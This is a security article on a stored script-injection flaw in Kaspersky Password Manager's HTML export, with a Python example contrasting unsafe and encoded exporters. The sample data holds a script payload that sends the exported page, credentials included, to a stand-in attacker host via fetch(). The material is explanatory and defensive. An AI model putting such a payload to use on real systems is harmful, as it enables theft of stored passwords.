A medium-severity filter and validation vulnerability affects Kaspersky Password Manager 18.104.22.168 and older versions.
The flaw allows a local attacker to inject malicious script code into the HTML file that the application produces when a password database is exported.
“The vulnerability is located in the validation of the html/xml export function/module & the bound vulnerable name, domain, url, comment (listing) parameters,” according to the advisory published by Vulnerability Lab.
“URLs of entries are embedded in the exported HTML file without encoding XML special characters. When the URL (domain) field of an entry contains malicious script code, this will be executed when the exported HTML file is opened in a browser,” the report said.
If exploited successfully, the vulnerability allows an attacker to persistently manipulate the application, mount phishing attacks, deliver malware, and even steal the victim’s passwords in clear text, since the exported file contains them. All of these operations require only moderate interaction on the user’s side.
The researchers also describe an exploitation scenario: the attacker sends the victim a crafted login page whose URL carries script code in its parameters.
The victim saves this malicious login page as an entry in the application via the AutoFill plugin, and the unencoded URL is stored with it.
Later, when the victim exports the database in HTML format using the standard template, the injected script runs as soon as the exported file is opened in a browser and sends the contents of the file, including the stored credentials, to a server controlled by the attacker.
For the time being, the issue remains unaddressed. The researchers recommend encoding XML special characters in item names and the other listed fields (domain, URL, comment) when exporting content as an HTML file, so that stored values are rendered as text rather than interpreted as markup.
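The following is an added illustration of the export flaw described in the advisory quotes and of the encoding fix the researchers recommend; it is example code written for this article, not Kaspersky’s code or the Vulnerability Lab proof of concept. The entry records, the table-based export template, the field names and the `attacker.invalid` host are all constructed assumptions. The unsafe exporter concatenates field values straight into the markup, as the advisory describes; the safe exporter HTML-encodes every field and, as an extra check the article does not mention, restricts `href` targets to http/https, because encoding alone does not stop a `javascript:` URL from running when the link is clicked.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample entries (hypothetical, not data from the advisory).
# The second entry's URL carries the kind of payload the advisory describes:
# it closes the attribute and element it is embedded in, then exfiltrates
# the page (including every exported credential) to an attacker host.
ENTRIES = [
    {"name": "Mail", "domain": "mail.example.com",
     "url": "https://mail.example.com/login", "comment": "work account"},
    {"name": "Bank", "domain": "bank.example.com",
     "url": ("https://bank.example.com/login#\"><script>"
             "fetch('https://attacker.invalid/?p='"
             "+encodeURIComponent(document.body.innerHTML))</script>"),
     "comment": "personal"},
]

FIELDS = ("name", "domain", "url", "comment")
TEMPLATE = ('<tr><td>{name}</td><td>{domain}</td>'
            '<td><a href="{href}">{url}</a></td><td>{comment}</td></tr>')


def export_html_unsafe(entries):
    """Export the way the advisory describes the vulnerable module:
    field values are pasted into the HTML template without encoding
    XML special characters, so a stored payload becomes live markup."""
    rows = [TEMPLATE.format(href=e["url"], **e) for e in entries]
    return "<html><body><table>\n" + "\n".join(rows) + "\n</table></body></html>"


def safe_href(url):
    """Attribute-encode the URL and only allow http/https targets.
    Anything else (javascript:, data:, ...) becomes an empty href."""
    url = url.strip()
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return ""
    return html.escape(url, quote=True)


def export_html_safe(entries):
    """Same template, but every field is HTML-encoded (quotes included,
    since some values land inside attributes) before it is inserted."""
    rows = []
    for e in entries:
        esc = {k: html.escape(str(e.get(k, "")), quote=True) for k in FIELDS}
        esc["href"] = safe_href(str(e.get("url", "")))
        rows.append(TEMPLATE.format(**esc))
    return "<html><body><table>\n" + "\n".join(rows) + "\n</table></body></html>"


def contains_active_content(doc):
    """Crude review check for an exported file: is there still a raw
    <script element or an inline on*= event-handler attribute?"""
    lowered = doc.lower()
    return "<script" in lowered or re.search(r"\son\w+\s*=", lowered) is not None


if __name__ == "__main__":
    for label, exporter in (("unsafe", export_html_unsafe),
                            ("safe", export_html_safe)):
        doc = exporter(ENTRIES)
        print(f"{label} export contains active content: "
              f"{contains_active_content(doc)}")
```

Running the script shows the unsafe export carrying a literal `<script>` element built from the stored URL, while the safe export renders the same value as inert `&lt;script&gt;` text in both the link text and the `href` attribute. The `contains_active_content` check is only a quick triage aid for already-exported files; the real fix belongs in the exporter, where the value's output context (text node versus attribute) is known.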